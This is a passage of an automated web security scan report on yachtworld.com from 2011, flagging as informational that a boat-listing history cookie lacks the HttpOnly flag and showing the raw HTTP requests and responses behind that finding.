Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 19:58:51 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Thu, 18 Nov 2010 20:30:49 GMT
Content-Language: en-US
Set-Cookie: VIEWED_BOATS_STORE=2272100%5B%25%5D32%27+Regulator+32+FS%5B%25%5DUSD%26nbsp%3B169%2C000%5B%25%5DHampton%2C+VA%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F7%2F2%2F1%2F2272100_1_mini.jpg%3F1286375575000%5B%25%5D%2Fboats%2F2008%2FRegulator-32-FS-2272100%2FHampton%2FVA%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 19:58:51 GMT
Set-Cookie: VIEWED_BOATS_STORE=2272100%5B%25%5D32%27+Regulator+32+FS%5B%25%5DUSD%26nbsp%3B169%2C000%5B%25%5DHampton%2C+VA%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F7%2F2%2F1%2F2272100_1_mini.jpg%3F1286375575000%5B%25%5D%2Fboats%2F2008%2FRegulator-32-FS-2272100%2FHampton%2FVA%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<t
...[SNIP]...

9.66. http://www.yachtworld.com/boats/2009/Regulator-32-Fs-2300541/Sardegna-centro-orientale/Italy previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/2009/Regulator-32-Fs-2300541/Sardegna-centro-orientale/Italy

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

VIEWED_BOATS_STORE=2300541%5B%25%5D32%27+Regulator+32+FS%5B%25%5DEUR%26nbsp%3B180%2C000%5B%25%5DSardegna+centro+orientale%2C+Italy%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F3%2F0%2F0%2F5%2F2300541_1_mini.jpg%3F1294838885000%5B%25%5D%2Fboats%2F2009%2FRegulator-32-FS-2300541%2FSardegna-centro-orientale%2FItaly%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 19:59:06 GMT
VIEWED_BOATS_STORE=2300541%5B%25%5D32%27+Regulator+32+FS%5B%25%5DEUR%26nbsp%3B180%2C000%5B%25%5DSardegna+centro+orientale%2C+Italy%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F3%2F0%2F0%2F5%2F2300541_1_mini.jpg%3F1294838885000%5B%25%5D%2Fboats%2F2009%2FRegulator-32-FS-2300541%2FSardegna-centro-orientale%2FItaly%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /boats/2009/Regulator-32-Fs-2300541/Sardegna-centro-orientale/Italy HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 19:59:06 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Wed, 12 Jan 2011 13:33:54 GMT
Content-Language: en-US
Set-Cookie: VIEWED_BOATS_STORE=2300541%5B%25%5D32%27+Regulator+32+FS%5B%25%5DEUR%26nbsp%3B180%2C000%5B%25%5DSardegna+centro+orientale%2C+Italy%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F3%2F0%2F0%2F5%2F2300541_1_mini.jpg%3F1294838885000%5B%25%5D%2Fboats%2F2009%2FRegulator-32-FS-2300541%2FSardegna-centro-orientale%2FItaly%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 19:59:06 GMT
Set-Cookie: VIEWED_BOATS_STORE=2300541%5B%25%5D32%27+Regulator+32+FS%5B%25%5DEUR%26nbsp%3B180%2C000%5B%25%5DSardegna+centro+orientale%2C+Italy%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F3%2F0%2F0%2F5%2F2300541_1_mini.jpg%3F1294838885000%5B%25%5D%2Fboats%2F2009%2FRegulator-32-FS-2300541%2FSardegna-centro-orientale%2FItaly%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<t
...[SNIP]...

9.67. http://www.yachtworld.com/boats/2010/Regulator-32fs-Center-Console-2293873/Brick/NJ/United-States previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/2010/Regulator-32fs-Center-Console-2293873/Brick/NJ/United-States

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

VIEWED_BOATS_STORE=2293873%5B%25%5D32%27+Regulator+32FS+Center+Console%5B%25%5DUSD%26nbsp%3B219%2C000%5B%25%5DBrick%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F9%2F3%2F8%2F2293873_1_mini.jpg%3F1292001735000%5B%25%5D%2Fboats%2F2010%2FRegulator-32FS-Center-Console-2293873%2FBrick%2FNJ%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 20:00:18 GMT
VIEWED_BOATS_STORE=2293873%5B%25%5D32%27+Regulator+32FS+Center+Console%5B%25%5DUSD%26nbsp%3B219%2C000%5B%25%5DBrick%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F9%2F3%2F8%2F2293873_1_mini.jpg%3F1292001735000%5B%25%5D%2Fboats%2F2010%2FRegulator-32FS-Center-Console-2293873%2FBrick%2FNJ%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRA